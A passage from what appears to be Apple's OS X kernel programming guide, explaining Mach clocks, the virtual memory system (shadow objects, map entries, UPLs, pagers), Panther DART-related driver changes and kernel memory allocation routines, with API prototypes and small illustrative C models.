The traditional abstraction of time in Mach is the clock, which provides a set of asynchronous alarm services based on mach_timespec_t. There are one or more clock objects, each defining a monotonically increasing time value expressed in nanoseconds. The real-time clock is built in, and is the most important, but there may be other clocks for other notions of time in the system. Clocks support operations to get the current time, sleep for a given period, set an alarm (a notification that is sent at a given time), and so forth.

The mach_timespec_t API is deprecated in OS X. The newer and preferred API is based on timer objects that in turn use AbsoluteTime as the basic data type. AbsoluteTime is a machine-dependent type, typically based on the platform-native time base. Routines are provided to convert AbsoluteTime values to and from other data types, such as nanoseconds. Timer objects support asynchronous, drift-free notification, cancellation, and premature alarms. They are more efficient and permit higher resolution than clocks.

Memory and Virtual Memory

This chapter describes allocating memory and the low-level routines for modifying memory maps in the kernel. It also describes a number of commonly used interfaces to the virtual memory system. It does not describe how to make changes in paging policy or add additional pagers. OS X does not support external pagers, although much of the functionality can be achieved in other ways, some of which are covered at a high level in this chapter.
The implementation details of these interfaces are subject to change, however, and are thus left undocumented.

With the exception of the section “Allocating Memory in the Kernel” (page 73), this chapter is of interest only if you are writing file systems or are modifying the virtual memory system itself.

OS X VM Overview

The VM system used in OS X is a descendant of Mach VM, which was created at Carnegie Mellon University in the 1980s. To a large extent, the fundamental design is the same, although some of the details are different, particularly when enhancing the VM system. The OS X VM system does, however, support the ability to request certain paging behavior through the use of universal page lists (UPLs). See “Universal Page Lists (UPLs)” (page 65) for more information.

The design of Mach VM centers around the concept of physical memory being a cache for virtual memory.

At its highest level, Mach VM consists of address spaces and ways to manipulate the contents of those address spaces from outside the space. These address spaces are sparse and have a notion of protections to limit what tasks can access their contents.

At a lower level, the object level, virtual memory is seen as a collection of VM objects and memory objects, each with a particular owner and protections. These objects can be modified with object calls that are available both to the task and (via the back end of the VM) to the pagers.

Note: While memory objects and VM objects are closely related, the terms are not equivalent and should not be confused. A VM object can be backed by one or more memory objects, which are, in turn, managed by a pager. A VM object may also be partially backed by other VM objects, as occurs in the case of shadow chains (described later in this section). The VM object is internal to the virtual memory system, and includes basic information about accessing the memory.
The memory object, by contrast, is provided by the pager. The contents of the memory associated with that memory object can be retrieved from disk or some other backing store by exchanging messages with the memory object. Implicitly, each VM object is associated with a given pager through its memory object.

VM objects are cached with system pages (RAM), which can be any power of two multiple of the hardware page size. In the OS X kernel, system pages are the same size as hardware pages. Each system page is represented in a given address space by a map entry. Each map entry has its own protection and inheritance. A given map entry can have an inheritance of shared, copy, or none. If a page is marked shared in a given map, child tasks share this page for reading and writing. If a page is marked copy, child tasks get a copy of this page (using copy-on-write). If a page is marked none, the child’s page is left unallocated.

VM objects are managed by the machine-independent VM system, with the underlying virtual to physical mappings handled by the machine-dependent pmap system. The pmap system actually handles page tables, translation lookaside buffers, segments, and so on, depending on the design of the underlying hardware.

When a VM object is duplicated (for example, the data pages from a process that has just called fork), a shadow object is created. A shadow object is initially empty, and contains a reference to another object. When the contents of a page are modified, the page is copied from the parent object into the shadow object and then modified. When reading data from a page, if that page exists in the shadow object, the page listed in the shadow object is used. If the shadow object has no copy of that page, the original object is consulted. A series of shadow objects pointing to shadow objects or original objects is known as a shadow chain. Shadow chains can become arbitrarily long if an object is heavily reused in a copy-on-write fashion.
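The read and write rules for shadow objects described above can be sketched as a small, self-contained C model. This is a toy illustration, not the kernel's VM object implementation: toy_vm_object, toy_read, toy_write, and toy_shadow_demo are hypothetical names, a single int stands in for the contents of a page, the page count is arbitrary, and page indexes are not bounds-checked.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy model only: every name here is invented for illustration; none is a kernel API. */
#define TOY_PAGES 4   /* arbitrary number of pages per object */

struct toy_vm_object {
    bool present[TOY_PAGES];         /* does this object hold its own copy of the page? */
    int  data[TOY_PAGES];            /* one int stands in for a page's contents */
    struct toy_vm_object *shadowed;  /* the object this one shadows, or NULL for an original */
};

/* Read: walk the chain from the front until some object holds the page.
 * Returns false if no object in the chain has it. */
bool toy_read(const struct toy_vm_object *obj, int page, int *out)
{
    for (; obj != NULL; obj = obj->shadowed) {
        if (obj->present[page]) {
            *out = obj->data[page];
            return true;
        }
    }
    return false;
}

/* Write: if the front object lacks the page, first copy it up from the chain
 * (or start from zero if it exists nowhere), then modify only the front copy. */
void toy_write(struct toy_vm_object *front, int page, int value)
{
    if (!front->present[page]) {
        int old = 0;
        (void)toy_read(front->shadowed, page, &old);
        front->data[page] = old;       /* the copy step of copy-on-write */
        front->present[page] = true;
    }
    front->data[page] = value;
}

/* A child's write lands in its shadow object; the original is untouched. */
int toy_shadow_demo(void)
{
    struct toy_vm_object original = { .present = { true }, .data = { 10 } };
    struct toy_vm_object shadow   = { .shadowed = &original };  /* initially empty */
    int v = 0;

    assert(toy_read(&shadow, 0, &v) && v == 10);    /* falls through to the original */
    toy_write(&shadow, 0, 99);
    assert(toy_read(&shadow, 0, &v) && v == 99);    /* now served by the shadow */
    assert(toy_read(&original, 0, &v) && v == 10);  /* original is unchanged */
    return 0;
}
```

Because every read may have to walk the whole chain, the cost of a lookup in this model grows with the chain length, which is why chain length matters in practice.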
However, since fork is frequently followed by exec, which replaces all of the material being shadowed, long chains are rare. Further, Mach automatically garbage collects shadow objects, removing any intermediate shadow objects whose pages are no longer referenced by any (nondefunct) shadow object. It is even possible for the original object to be released if it no longer contains pages that are relevant to the chain.

The VM calls available to an application include vm_map and vm_allocate, which can be used to map file data or anonymous memory into the address space. This is possible only because the address space is initially sparse. In general, an application can either map a file into its address space (through file mapping primitives, abstracted by BSD) or it can map an object (after being passed a handle to that object). In addition, a task can change the protections of the objects in its address space and can share those objects with other tasks.

In addition to the mapping and allocation aspects of virtual memory, the VM system contains a number of other subsystems. These include the back end (pagers) and the shared memory subsystem. There are also other subsystems closely tied to VM, including the VM shared memory server. These are described in “Other VM and VM-Related Subsystems” (page 68).

Memory Maps Explained

Each Mach task has its own memory map. In Mach, this memory map takes the form of an ordered doubly linked list. As described in “OS X VM Overview” (page 61), each of these objects contains a list of pages and shadow references to other objects.

In general, you should never need to access a memory map directly unless you are modifying something deep within the VM system. The vm_map_entry structure contains task-specific information about an individual mapping along with a reference to the backing object.
In essence, it is the glue between a VM object and a VM map.

While the details of this data structure are beyond the scope of this document, a few fields are of particular importance.

The field is_submap is a Boolean value that tells whether this map entry is a normal VM object or a submap. A submap is a collection of mappings that is part of a larger map. Submaps are often used to group mappings together for the purpose of sharing them among multiple Mach tasks, but they may be used for many purposes. What makes a submap particularly powerful is that when several tasks have mapped a submap into their address space, they can see each other’s changes, not only to the contents of the objects in the map, but to the objects themselves. This means that as additional objects are added to or deleted from the submap, they appear in or disappear from the address spaces of all tasks that share that submap.

The field behavior controls the paging reference behavior of a specified range in a given map. This value changes how pageins are clustered. Possible values are VM_BEHAVIOR_DEFAULT, VM_BEHAVIOR_RANDOM, VM_BEHAVIOR_SEQUENTIAL, and VM_BEHAVIOR_RSEQNTL, for default, random, sequential, or reverse-sequential pagein ordering.

The protection and max_protection fields control the permissions on the object. The protection field indicates what rights the task currently has for the object, while the max_protection field contains the maximum access that the current task can obtain for the object.

You might use the protection field when debugging shared memory. By setting the protection to be read-only, any inadvertent writes to the shared memory would cause an exception. However, when the task actually needs to write to that shared region, it could increase its permissions in the protection field to allow writes.
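The relationship between the two fields can be sketched with a small, self-contained C model in which the current protection can be changed freely as long as it stays within the maximum. This is a toy illustration only: toy_map_entry, toy_protect, toy_write_allowed, and toy_protect_demo are hypothetical names, and the TOY_PROT_* bit values are assumptions chosen for the sketch rather than definitions taken from the kernel headers.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model only: every name and value here is invented for illustration. */
#define TOY_PROT_NONE  0x0
#define TOY_PROT_READ  0x1
#define TOY_PROT_WRITE 0x2

struct toy_map_entry {
    int protection;      /* rights the task currently has */
    int max_protection;  /* ceiling on the rights the task can obtain */
};

/* Change the current protection. Any request containing a bit that is
 * not present in max_protection is refused and leaves the entry unchanged. */
bool toy_protect(struct toy_map_entry *e, int new_prot)
{
    if ((new_prot & ~e->max_protection) != 0)
        return false;
    e->protection = new_prot;
    return true;
}

/* A write would raise an exception unless the current protection allows it. */
bool toy_write_allowed(const struct toy_map_entry *e)
{
    return (e->protection & TOY_PROT_WRITE) != 0;
}

/* Debugging pattern from the text: keep a shared region read-only,
 * then raise the protection only around intentional writes. */
int toy_protect_demo(void)
{
    struct toy_map_entry shared = { TOY_PROT_READ, TOY_PROT_READ | TOY_PROT_WRITE };

    assert(!toy_write_allowed(&shared));                          /* stray writes are caught */
    assert(toy_protect(&shared, TOY_PROT_READ | TOY_PROT_WRITE)); /* within the ceiling */
    assert(toy_write_allowed(&shared));
    assert(toy_protect(&shared, TOY_PROT_READ));                  /* drop back to read-only */
    return 0;
}
```

An entry whose max_protection is read-only can never be made writable through toy_protect in this model, regardless of how often the task asks.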
It would be a security hole if a task could increase its own permissions on a memory object arbitrarily, however. In order to preserve a reasonable security model, the task that owns a memory object must be able to limit the rights granted to a subordinate task. For this reason, a task is not allowed to increase its protection beyond the permissions granted in max_protection.

Possible values for protection and max_protection are described in detail in xnu/osfmk/mach/vm_prot.h.

Finally, the use_pmap field indicates whether a submap’s low-level mappings should be shared among all tasks into which the submap is mapped. If the mappings are not shared, then the structure of the map is shared among all tasks, but the actual contents of the pages are not.

For example, shared libraries are handled with two submaps. The read-only shared code section has use_pmap set to true. The read-write (nonshared) section has use_pmap set to false, forcing a clean copy of the library’s DATA segment to be mapped in from disk for each new task.

Named Entries

The OS X VM system provides an abstraction known as a named entry. A named entry is nothing more than a handle to a shared object or a submap.

Shared memory support in OS X is achieved by sharing objects between the memory maps of various tasks. Shared memory objects must be created from existing VM objects by calling vm_allocate to allocate memory in your address space and then calling mach_make_memory_entry_64 to get a handle to the underlying VM object.

The handle returned by mach_make_memory_entry_64 can be passed to vm_map to map that object into a given task’s address space. The handle can also be passed via IPC or other means to other tasks so that they can map it into their address spaces. This provides the ability to share objects with tasks that are not in your direct lineage, and also allows you to share additional memory with tasks in your direct lineage after those tasks are created.
The other form of named entry, the submap, is used to group a set of mappings. The most common use of a submap is to share mappings among multiple Mach tasks. A submap can be created with vm_region_object_create.

What makes a submap particularly powerful is that when several tasks have mapped a submap into their address space, they can see each other’s changes to both the data and the structure of the map. This means that one task can map or unmap a VM object in another task’s address space simply by mapping or unmapping that object in the submap.

Universal Page Lists (UPLs)

A universal page list, or UPL, is a data structure used when communicating with the virtual memory system. UPLs can be used to change the behavior of pages with respect to caching, permissions, mapping, and so on. UPLs can also be used to push data into and pull data from VM objects. The term is also often used to refer to the family of routines that operate on UPLs.

The flags used when dealing with UPLs are described in osfmk/mach/memory_object_types.h.

The life cycle of a UPL looks like this:

1. A UPL is created based on the contents of a VM object. This UPL includes information about the pages within that object.
2. That UPL is modified in some way.
3. The changes to the UPL are either committed (pushed back to the VM system) or aborted, with ubc_upl_commit or ubc_upl_abort, respectively.

If you have a control handle for a given VM object (which generally means that you are inside a pager), you can use vm_object_upl_request to get a UPL for that object. Otherwise, you must use the vm_map_get_upl call. In either case, you are left with a handle to the UPL.

When a pagein is requested, the pager receives a list of pages that are locked against the object, with certain pages set to not valid.
The pager must either write data into those pages or must abort the transaction to prevent invalid data in the kernel. Similarly in pageout, the kernel must write the data to a backing store or abort the transaction to prevent data loss. The pager may also elect to bring additional pages into memory or throw additional pages out of memory at its discretion.

Because pagers can be used both for virtual memory and for memory mapping of file data, when a pageout is requested, the data may need to be freed from memory, or it may be desirable to keep it there and simply flush the changes to disk. For this reason, the flag UPL_CLEAN_IN_PLACE exists to allow a page to be flushed to disk but not removed from memory.

When a pager decides to page in or out additional pages, it must determine which pages to move. A pager can request all of the dirty pages by setting the RETURN_ONLY_DIRTY flag. It can also request all pages that are not in memory using the RETURN_ONLY_ABSENT flag.

There is a slight problem, however. If a given page is marked as BUSY in the UPL, a request for information on that page would normally block. If the pager is doing prefetching or preflushing, this is not desirable, since it might be blocking on itself or on some other pager that is blocked waiting for the current transaction to complete. To avoid such deadlock, the UPL mechanism provides the UPL_NOBLOCK flag. This is frequently used in the anonymous pager for requesting free memory.

The flag QUERY_OBJECT_TYPE can be used to determine if an object is physically contiguous and to get other properties of the underlying object.

The flag UPL_PRECIOUS means that there should be only one copy of the data. This prevents having a copy both in memory and in the backing store.
However, this breaks the adjacency of adjacent pages in the backing store, and the flag is thus generally not used, in order to avoid a performance hit.

The flag SET_INTERNAL is used by the BSD subsystem to cause all information about a UPL to be contained in a single memory object so that it can be passed around more easily. It can only be used if your code is running in the kernel’s address space.

Since this handle can be used for multiple small transactions (for example, when mapping a file into memory block-by-block), the UPL API includes functions for committing and aborting changes to only a portion of the UPL. These functions are upl_commit_range and upl_abort_range, respectively.

To aid in the use of UPLs for handling multi-part transactions, the upl_commit_range and upl_abort_range calls have a flag that causes the UPL to be freed when there are no unmodified pages in the UPL. If you use this flag, you must be very careful not to use the UPL after all ranges have been committed or aborted.

Finally, the function vm_map_get_upl is frequently used in file systems. It gets the underlying VM object associated with a given range within an address space. Since this returns only the first object in that range, it is your responsibility to determine whether the entire range is covered by the resulting UPL and, if not, to make additional calls to get UPLs for other objects. Note that while the vm_map_get_upl call is against an address space range, most UPL calls are against a vm_object.

Using Mach Memory Maps

Warning: This section describes the low-level API for dealing with Mach VM maps. These maps cannot be modified in this way from a kernel extension. These functions are not available for use in a KEXT. They are presented strictly for use within the VM system and other parts of Mach. If you are not doing in-kernel development, you should be using the methods described in the chapter “Boundary Crossings” (page 109).
From the context of the kernel (not from a KEXT), there are two maps that you will probably need to deal with. The first is the kernel map. Since your code is executing in the kernel’s address space, no additional effort is needed to use memory referenced in the kernel map. However, you may need to add additional mappings into the kernel map and remove them when they are no longer needed.

The second map of interest is the memory map for a given task. This is of most interest for code that accepts input from user programs, for example a sysctl or a Mach RPC handler. In nearly all cases, convenient wrappers provide the needed functionality, however.

Most of these functions are based around the vm_offset_t type, which is a pointer-sized integer. In effect, you can think of them as pointers, with the caveat that they are not necessarily pointers to data in the kernel’s address space, depending on usage.

The low-level VM map API includes the following functions:

kern_return_t vm_map_copyin(vm_map_t src_map, vm_offset_t src_addr,
    vm_size_t len, boolean_t src_destroy,
    vm_map_copy_t *copy_result);

kern_return_t vm_map_copyout(vm_map_t map, vm_offset_t *addr, /* Out */
    register vm_map_copy_t copy);

kern_return_t vm_map_copy_overwrite(vm_map_t dst_map,
    vm_offset_t dst_address, vm_map_copy_t copy,
    boolean_t interruptible, pmap_t pmap);

void vm_map_copy_discard(vm_map_copy_t copy);

void vm_map_wire(vm_map_t map, vm_offset_t start, vm_offset_t end,
    vm_prot_t access_type, boolean_t user_wire);

void vm_map_unwire(vm_map_t map, vm_offset_t start, vm_offset_t end,
    boolean_t user_wire);

The function vm_map_copyin copies data from an arbitrary (potentially non-kernel) memory map into a copy list and returns the copy list pointer in copy_result. If something goes wrong and you need to throw away this intermediate object, it should be freed with vm_map_copy_discard.
In order to actually get the data from the copy list, you need to overwrite a memory object in the kernel’s address space with vm_map_copy_overwrite. This overwrites an object with the contents of a copy list. For most purposes, the value passed for interruptible should be FALSE, and pmap should be NULL.

Copying data from the kernel to user space is exactly the same as copying data from user space, except that you pass kernel_map to vm_map_copyin and pass the user map to vm_map_copy_overwrite. In general, however, you should avoid doing this, since you could end up with a task’s memory being fragmented into lots of tiny objects, which is undesirable.

Do not use vm_map_copyout when copying data into an existing user task’s address map. The function vm_map_copyout is used for filling an unused region in an address map. If the region is allocated, then vm_map_copyout does nothing. Because it requires knowledge of the current state of the map, it is primarily used when creating a new address map (for example, if you are manually creating a new process). For most purposes, you do not need to use vm_map_copyout.

The functions vm_map_wire and vm_map_unwire can be used to wire and unwire portions of an address map. If you set the argument user_wire to TRUE, then the page can be unwired from user space. This should be set to FALSE if you are about to use the memory for I/O or for some other operation that cannot tolerate paging. In vm_map_wire, the argument access_type indicates the types of accesses that should not be allowed to generate a page fault. In general, however, you should be using vm_wire to wire memory.

As mentioned earlier, this information is presented strictly for use in the heart of the kernel. You cannot use anything in this section from a kernel extension.
Other VM and VM-Related Subsystems

There are two additional VM subsystems: pagers and the working set detection subsystem. In addition, the VM shared memory server subsystem is closely tied to (but is not part of) the VM subsystem. This section describes these three VM and VM-related subsystems.

Pagers

OS X has three basic pagers: the vnode pager, the default pager (or anonymous pager), and the device pager. These are used by the VM system to actually get data into the VM objects that underlie named entries. Pagers are linked into the VM system through a combination of a subset of the old Mach pager interface and UPLs.

The default pager is what most people think of when they think of a VM system. It is responsible for moving normal data into and out of the backing store. In addition, there is a facility known as the dynamic pager that sits on top of the default pager and handles the creation and deletion of backing store files. These pager files are filled with data in clusters (groups of pages).

When the total fullness of the paging file pool reaches a high-water mark, the default pager asks the dynamic pager to allocate a new store file. When the pool drops below its low-water mark, the VM system selects a pager file, moves its contents into other pager files, and deletes it from disk.

The vnode pager has a 1:1 (onto) mapping between objects in VM space and open files (vnodes). It is used for memory mapped file I/O. The vnode pager is generally hidden behind calls to BSD file APIs.

The device pager allows you to map non-general-purpose memory with the cache characteristics required for that memory (WIMG). Non-general-purpose memory includes physical addresses that are mapped onto hardware other than main memory, for example PCI memory, frame buffer memory, and so on.
The device pager is generally hidden behind calls to various I/O Kit functions.

Working Set Detection Subsystem

To improve performance, OS X has a subsystem known as the working set detection subsystem. This subsystem is called on a VM fault; it keeps a profile of the fault behavior of each task from the time of its inception. In addition, just before a page request, the fault code asks this subsystem which adjacent pages should be brought in, and then makes a single large request to the pager.

Since files on disk tend to have fairly good locality, and since address space locality is largely preserved in the backing store, this provides a substantial performance boost. Also, since it is based upon the application’s previous behavior, it tends to pull in pages that would probably have otherwise been needed later. This occurs for all pagers.

The working set code works well once it is established. However, without help, its performance would be the baseline performance until a profile for a given application has been developed. To overcome this, the first time that an application is launched in a given user context, the initial working set required to start the application is captured and stored in a file. From then on, when the application is started, that file is used to seed the working set.

These working set files are established on a per-user basis. They are stored in /var/vm/app_profile and are only accessible by the super-user (and the kernel).

VM Shared Memory Server Subsystem

The VM shared memory server subsystem is a BSD service that is closely tied to VM, but is not part of VM. This server provides two submaps that are used for shared library support in OS X.

Because shared libraries contain both read-only portions (text segment) and read-write portions (data segment), the two portions are treated separately to maximize efficiency. The read-only portions are completely shared between tasks, including the underlying pmap entries.
The read-write portions share a common submap, but have different underlying data objects (achieved through copy-on-write).

The three functions exported by the VM shared memory server subsystem should only be called by dyld. Do not use them in your programs.

The function load_shared_file is used to load a new shared library into the system. Once such a file is loaded, other tasks can then depend on it, so a shared library cannot be unshared. However, a new set of shared regions can be created with new_system_shared_regions so that no new tasks will use old libraries.

The function reset_shared_file can be used to reset any changes that your task may have made to its private copy of the data section for a file.

Finally, the function new_system_shared_regions can be used to create a new set of shared regions for future tasks. New regions can be used when updating prebinding with new shared libraries to cause new tasks to see the latest libraries at their new locations in memory. (Users of old shared libraries will still work, but they will fall off the pre-bound path and will perform less efficiently.) It can also be used when dealing with private libraries that you want to share only with your task’s descendants.

Address Spaces

This section explains issues that some developers may see when using their drivers in Panther or later. These changes were necessitated by a combination of hardware and underlying OS changes; however, you may see problems resulting from the changes even on existing hardware.

There are three basic areas of change in OS X v10.3. These are:

● IOMemoryDescriptor changes
● VM system (pmap) changes
● Kernel dependency changes

These are described in detail in the sections that follow.
Background Info on PCI Address Translation

To allow existing device drivers to work with upcoming 64-bit system architectures, a number of changes were required. To explain these, a brief introduction to PCI bus bridges is needed.

When a PCI device needs to perform a data transaction to or from main memory, the device driver calls a series of functions intended to prepare this memory for I/O. In an architecture where both the device drivers and the memory subsystem use 32-bit addressing, everything just works, so long as the memory doesn't get paged out during the I/O operation. As kernel memory is generally not pageable, the preparation is largely superfluous.

On a system whose memory subsystem uses 64-bit addressing, however, this becomes a bit of a problem. Because the hardware devices on the PCI bus can only handle 32-bit addresses, the device can only “see” a 4 gigabyte aperture into the (potentially much larger) main memory at any given time.

There are two possible solutions for this problem. The easy (but slow) solution would be to use “bounce buffers”. In such a design, device drivers would copy data into memory specifically allocated within the bottom 4 gigs of memory. However, this incurs a performance penalty and also puts additional constraints on the lower 4 gigs of memory, causing numerous problems for the VM system.

The other solution, the one chosen in Apple's 64-bit implementation, is to use address translation to “map” blocks of memory into the 32-bit address space of the PCI devices. While the PCI device can still only see a 4 gig aperture, that aperture can then be non-contiguous, and thus bounce buffers and other restrictions are unnecessary. This address translation is done using a part of the memory controller known as DART, which stands for Device Address Resolution Table.

This introduces a number of potential problems, however.
First, physical addresses as seen by the processor no longer map 1:1 onto the addresses as seen by PCI devices. Thus, a new term, I/O addresses, is introduced to describe this new view. Because I/O addresses and physical addresses are no longer the same, the DART must keep a table of translations to use when mapping between them. Fortunately, if your driver is written according to Apple guidelines (using only documented APIs), this process is handled transparently.

Note: This additional addressing mode has an impact when debugging I/O Kit device drivers. For more information, see “When Things Go Wrong: Debugging the Kernel” (page 161).

IOMemoryDescriptor Changes

When your driver calls IOMemoryDescriptor::prepare, a mapping is automatically injected into the DART. When it calls IOMemoryDescriptor::release, the mapping is removed. If you fail to do this, your driver could experience random data corruption or panics.

Because the DART requires different caching for reads and writes, the DMA direction is important on hardware that includes a DART. While you may receive random failures if the direction is wrong in general (on any system), if you attempt to call WriteBytes on a memory region whose DMA direction is set up for reading, you will cause a kernel panic on 64-bit hardware.

If you attempt to perform a DMA transaction to unwired (user) memory, on previous systems, you would only get random crashes, panics, and data corruption. On machines with a DART, you will likely get no data whatsoever.

As a side-effect of changes in the memory subsystem, OS X is much more likely to return physically contiguous page ranges in memory regions. Historically, OS X returned multi-page memory regions in reverse order, starting with the last page and moving towards the first page. The result of this was that multi-page memory regions essentially never had a contiguous range of physical pages.
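To see why the order of the underlying pages matters, the following user-space sketch counts the physically contiguous runs in a region, given the physical page number behind each successive virtual page. It is an illustration only: the function name and the page-number arrays are hypothetical and are not part of any kernel API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Count the physically contiguous runs in a region, given the physical
 * page number backing each successive virtual page. A run continues only
 * while each page number is exactly one greater than the previous one.
 */
static size_t example_count_contiguous_runs(const uint64_t *phys_pages,
                                            size_t count)
{
    size_t runs = 0;
    size_t i;

    assert(phys_pages != NULL || count == 0);
    for (i = 0; i < count; i++) {
        if (i == 0 || phys_pages[i] != phys_pages[i - 1] + 1) {
            runs++; /* this page starts a new run */
        }
    }
    return runs;
}
```

For a four-page region backed in reverse order (pages 9, 8, 7, 6), every page starts its own run, so the function reports four runs. The same pages in ascending order (6, 7, 8, 9) form a single run, which is the case a driver is now more likely to encounter.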
Because of the increased probability of seeing physically contiguous blocks of memory in a memory region, this change may expose latent bugs in some drivers that only show up when handling contiguous ranges of physical pages, which could result in incorrect behavior or panics.

Note that the problems mentioned above are caused by bugs in the drivers, and could result in problems on older hardware prior to Panther. These issues are more likely to occur in Panther and later versions of OS X, however, because of the new hardware designs and the OS changes that were made to support those designs.

VM System and pmap Changes:

In Panther, as a result of the changes described in detail in the section on PCI address translation, physical addresses obtained directly from the pmap layer have no useful purpose outside the VM system itself. To prevent their inadvertent use in device drivers, the pmap calls are no longer available from kernel extensions.

A few drivers written prior to the addition of the IOMemoryDescriptor class still use pmap calls to get the physical pages associated with a virtual address. Also, a few developers have looked at the IOMemoryDescriptor implementation and chosen to obtain addresses directly from the pmap layer to remove what was perceived as an unnecessary abstraction layer.

Even without removing access to the pmap calls, these drivers would not function on systems with a DART (see the PCI section above for info on DARTs). To better emphasize this upcoming failure, Panther will cause these drivers to fail to load with an undefined symbol error (generally for pmap_extract) even on systems without a DART.

Kernel Dependency Changes

Beginning in Panther, device drivers that declare a dependency on version 7 (the Panther version) of the I/O Kit will no longer automatically get symbols from Mach and BSD.
This change was made to discourage I/O Kit developers from relying on symbols that are not explicitly approved for use in the I/O Kit.

Existing drivers are unaffected by this change. This change only affects you if you explicitly modify your device driver to declare a dependency on version 7 of the I/O Kit to take advantage of new I/O Kit features.

Summary

As described above, some device drivers may require minor modifications to support Panther and higher. Apple has made every effort to ensure compatibility with existing device drivers to the greatest extent possible, but a few drivers may break. If your driver breaks, you should first check to see if your driver includes any of the bugs described in the previous sections. If it does not, contact Apple Developer Technical Support for additional debugging suggestions.

Allocating Memory in the Kernel

As with most things in the OS X kernel, there are a number of ways to allocate memory. The choice of routines depends both on the location of the calling routine and on the reason for allocating memory. In general, you should use Mach routines for allocating memory unless you are writing code for use in the I/O Kit, in which case you should use I/O Kit routines.

Allocating Memory From a Non-I/O-Kit Kernel Extension

The <libkern/OSMalloc.h> header defines the following routines for kernel memory allocation:

● OSMalloc: allocates a block of memory.
● OSMalloc_noblock: allocates a block of memory, but immediately returns NULL if the request would block.
● OSMalloc_nowait: same as OSMalloc_noblock.
● OSFree: releases memory allocated with any of the OSMalloc variants.
● OSMalloc_Tagalloc: allows you to create a unique tag for your memory allocations. You must create at least one tag before you can use any of the OSMalloc functions.
● OSMalloc_Tagfree: releases a tag allocated with OSMalloc_Tagalloc.
(You must release all allocations associated with that tag before you call this function.)

For example, to allocate and free a page of wired memory, you might write code like this:

    #include <libkern/OSMalloc.h>

    #define MYTAGNAME "com.apple.mytag"

    ...

    OSMallocTag mytag = OSMalloc_Tagalloc(MYTAGNAME, OSMT_DEFAULT);
    void *datablock = OSMalloc(PAGE_SIZE_64, mytag);

    ...

    OSFree(datablock, PAGE_SIZE_64, mytag);

To allocate a page of pageable memory, pass OSMT_PAGEABLE instead of OSMT_DEFAULT in your call to OSMalloc_Tagalloc.

Allocating Memory From the I/O Kit

Although the I/O Kit is generally beyond the scope of this document, the I/O Kit memory management routines are presented here for completeness. In general, I/O Kit routines should not be used outside the I/O Kit. Similarly, Mach allocation routines should not be directly used from the I/O Kit because the I/O Kit has abstractions for those routines that fit the I/O Kit development model more closely.

The I/O Kit includes the following routines for kernel memory allocation:

    void *IOMalloc(vm_size_t size);
    void *IOMallocAligned(vm_size_t size, vm_size_t alignment);
    void *IOMallocContiguous(vm_size_t size, vm_size_t alignment,
        IOPhysicalAddress *physicalAddress);
    void *IOMallocPageable(vm_size_t size, vm_size_t alignment);
    void IOFree(void *address, vm_size_t size);
    void IOFreeAligned(void *address, vm_size_t size);
    void IOFreeContiguous(void *address, vm_size_t size);
    void IOFreePageable(void *address, vm_size_t size);

Most of these routines are relatively transparent wrappers around the Mach allocation functions. There are two major differences, however. First, the caller does not need to know which memory map is being modified. Second, they have a separate free call for each allocation call for internal bookkeeping reasons.

The functions IOMallocContiguous and IOMallocAligned differ somewhat from their Mach underpinnings.
IOMallocAligned uses calls directly to Mach VM to add support for arbitrary (power of 2) data alignment, rather than aligning based on the size of the object. IOMallocContiguous adds an additional parameter, physicalAddress. If this pointer is not NULL, the physical address is returned through this pointer. Using Mach functions, obtaining the physical address requires a separate function call.

Important: If your KEXT allocates memory that will be shared, you should create a buffer of type IOMemoryDescriptor or IOBufferMemoryDescriptor and specify that the buffer should be sharable. If you are allocating memory in a user application that will be shared with the kernel, you should use valloc or vm_allocate instead of malloc and then call mach_make_memory_entry_64.

Allocating Memory In the Kernel Itself

In addition to the routines available to kernel extensions, there are a number of other functions you can call to allocate memory when you are modifying the Mach kernel itself.

Mach routines provide a relatively straightforward interface for allocating and releasing memory. They are the preferred mechanism for allocating memory outside of the I/O Kit. BSD also offers _MALLOC and _FREE, which may be used in BSD parts of the kernel.

These routines do not provide for forced mapping of a given physical address to a virtual address. However, if you need such a mapping, you are probably writing a device driver, in which case you should be using I/O Kit routines instead of Mach routines.

Most of these functions are based around the vm_offset_t type, which is a pointer-sized integer. In effect, you can think of them as pointers, with the caveat that they are not necessarily pointers to data in the kernel’s address space, depending on usage.
These are some of the commonly used Mach routines for allocating memory:

    kern_return_t kmem_alloc(vm_map_t map, vm_offset_t *addrp,
        vm_size_t size);
    void kmem_free(vm_map_t map, vm_offset_t addr, vm_size_t size);
    kern_return_t kmem_alloc_aligned(vm_map_t map, vm_offset_t *addrp,
        vm_size_t size);
    kern_return_t kmem_alloc_wired(vm_map_t map, vm_offset_t *addrp,
        vm_size_t size);
    kern_return_t kmem_alloc_pageable(vm_map_t map, vm_offset_t *addrp,
        vm_size_t size);
    kern_return_t kmem_alloc_contig(vm_map_t map, vm_offset_t *addrp,
        vm_size_t size, vm_offset_t mask, int flags);

These functions all take a map as the first argument. Unless you need to allocate memory in a different map, you should pass kernel_map for this argument.

All of the kmem_alloc functions except kmem_alloc_pageable allocate wired memory. The function kmem_alloc_pageable creates the appropriate VM structures but does not back the region with physical memory. This function could be combined with vm_map_copyout when creating a new address map, for example. In practice, it is rarely used.

The function kmem_alloc_aligned allocates memory aligned according to the value of the size argument, which must be a power of 2.

The function kmem_alloc_wired is synonymous with kmem_alloc and is appropriate for data structures that cannot be paged out. It is not strictly necessary; however, if you explicitly need certain pieces of data to be wired, using kmem_alloc_wired makes it easier to find those portions of your code.

The function kmem_alloc_contig attempts to allocate a block of physically contiguous memory. This is not always possible, and requires a full sort of the system free list even for short allocations. After startup, this sort can cause long delays, particularly on systems with lots of RAM. You should generally not use this function.
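The power-of-2 requirement that kmem_alloc_aligned places on its size argument is easy to check before making the call. The following user-space sketch shows the usual bit test, along with the mask arithmetic that power-of-2 alignment makes possible. The names example_is_power_of_2 and example_align_up are hypothetical helpers written for this illustration; they are not Mach or I/O Kit functions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* True if n is a nonzero power of 2 (exactly one bit set). */
static bool example_is_power_of_2(size_t n)
{
    return n != 0 && (n & (n - 1)) == 0;
}

/*
 * Round addr up to the next multiple of alignment.
 * The mask trick below is valid only when alignment is a power of 2.
 */
static uintptr_t example_align_up(uintptr_t addr, size_t alignment)
{
    assert(example_is_power_of_2(alignment));
    return (addr + (alignment - 1)) & ~((uintptr_t)alignment - 1);
}
```

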